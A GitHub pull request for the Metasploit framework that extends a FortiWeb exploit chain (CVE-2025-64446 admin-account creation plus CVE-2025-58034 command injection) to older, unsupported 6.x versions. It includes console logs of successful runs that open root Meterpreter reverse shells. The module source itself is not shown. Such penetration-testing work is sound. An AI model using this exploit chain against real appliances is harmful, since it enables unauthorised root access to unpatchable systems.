Skip to content

Update the FortiWeb exploit module (CVE-2025-64446 + CVE-2025-58034) to target older unsupported versions 6.x #20736

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open

Update the FortiWeb exploit module (CVE-2025-64446 + CVE-2025-58034) to target older unsupported versions 6.x #20736

wants to merge 3 commits into from
+329 −34

Conversation

@sfewer-r7
Copy link
Contributor

@sfewer-r7 sfewer-r7 commented Nov 27, 2025
edited
Loading

Overview

This pull requests updates the exploit/linux/http/fortinet_fortiweb_rce module (added in #20717) to add in support for older version of FortiWeb, versions 6.*, which are no longer under support from the vendor (so no patches available AFAIK), but are also vulnerable to this exploit chain.

To do this the module now has two targets, FortiWeb 8.x (set target 0), and FortiWeb 7.x and 6.x (set target 1). This is required as exploiting different major versions differs as follows:

  • On 6.* and 7.* both the Unix and Linux payloads work (like a fetch based native Meterpreter).
  • On 8.* the Unix payloads do work, but the Linux payloads do not, as the Linux Integrity Measurement Architecture (IMA) appraisal feature is present (see here for some discussion).

As we have different platforms for the payloads that can be used it makes sense to split it out into two targets.

Additionally the mechanism to trigger the command injection is via the CLI, and how we target the CLI differs between 6.* and 8.*/7.*.

The module will now version fingerprint the target before exploiting the command injection to make sure the Metasploit target supports the actual remote target appliance version.

The exploit module has now been verified to work successfully against 8.0.1, 7.4.8, 6.4.3, and 6.3.9.

Example against FortiWeb 6.3.9

msf exploit(linux/http/fortinet_fortiweb_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Creating a new admin account via CVE-2025-64446...
[+] New admin account successfully created: oren_hessel:BtNLqzMt
[*] Logging in...
[+] Successfully logged in as oren_hessel
[+] Detected target version: 6.3.9
[*] Executing payload via CVE-2025-58034...
[*] Uploading bootstrap payload chunk 1 of 7...
[*] Uploading bootstrap payload chunk 2 of 7...
[*] Uploading bootstrap payload chunk 3 of 7...
[*] Uploading bootstrap payload chunk 4 of 7...
[*] Uploading bootstrap payload chunk 5 of 7...
[*] Uploading bootstrap payload chunk 6 of 7...
[*] Amalgamating bootstrap payload chunks...
[*] Executing bootstrap payload...
[+] Finished.
[*] Meterpreter session 4 opened (192.168.86.122:4444 -> 192.168.86.204:23094) at 2025-11-27 12:17:30 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.204
OS           :  (Linux 5.4.0)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > shell
Process 9873 created.
Channel 1 created.
id      
uid=0(root) gid=0
cli admin console
FortiWeb # get system status
International Version: FortiWeb-HyperV 6.39,build1117(GA),201125

@sfewer-r7
add in exploit support for FortiWeb versions 6.x which are vulnerable…
f5e8aa8 
…, but no longer under support from the vendor.
@sfewer-r7 sfewer-r7 marked this pull request as draft November 27, 2025 15:02
@sfewer-r7
Copy link
Contributor Author

sfewer-r7 commented Nov 27, 2025

Also tested successfully against 6.4.3:

[*] Meterpreter session 3 opened (192.168.86.122:4444 -> 192.168.86.205:39760) at 2025-11-27 15:32:49 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.205
OS           :  (Linux 5.4.0)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > shell
Process 20143 created.
Channel 1 created.
id
uid=0(root) gid=0
cli admin console
FortiWeb # get system status
International Version: FortiWeb-HyperV 6.43,build1489(GA),230602

@sfewer-r7
Copy link
Contributor Author

sfewer-r7 commented Nov 27, 2025

Commit 0143128 gets both Unix and Linux payloads working on 6.* targets. I want to test this all more before I move out of Draft.

@sfewer-r7
Combine the 7.x and 6.x targets together, as Linux payloads work on 7…
795c38c 
….x also, so this target is Unix and Linux. This leaves the 8.x target Unix only due to IMA appraisal.
@sfewer-r7
Copy link
Contributor Author

sfewer-r7 commented Nov 28, 2025

Commit 795c38c combines the 7.* target with the 6.* target, as both Linux and Unix payloads work against those versions. So now the module has this:

msf exploit(linux/http/fortinet_fortiweb_rce) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   FortiWeb 8.x
    1   FortiWeb 7.x and 6.x


msf exploit(linux/http/fortinet_fortiweb_rce) >

This has now been confirmed to work against 8.0.1, 7.4.8, 6.4.3, and 6.3.9.

@sfewer-r7 sfewer-r7 marked this pull request as ready for review November 28, 2025 10:19
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@sfewer-r7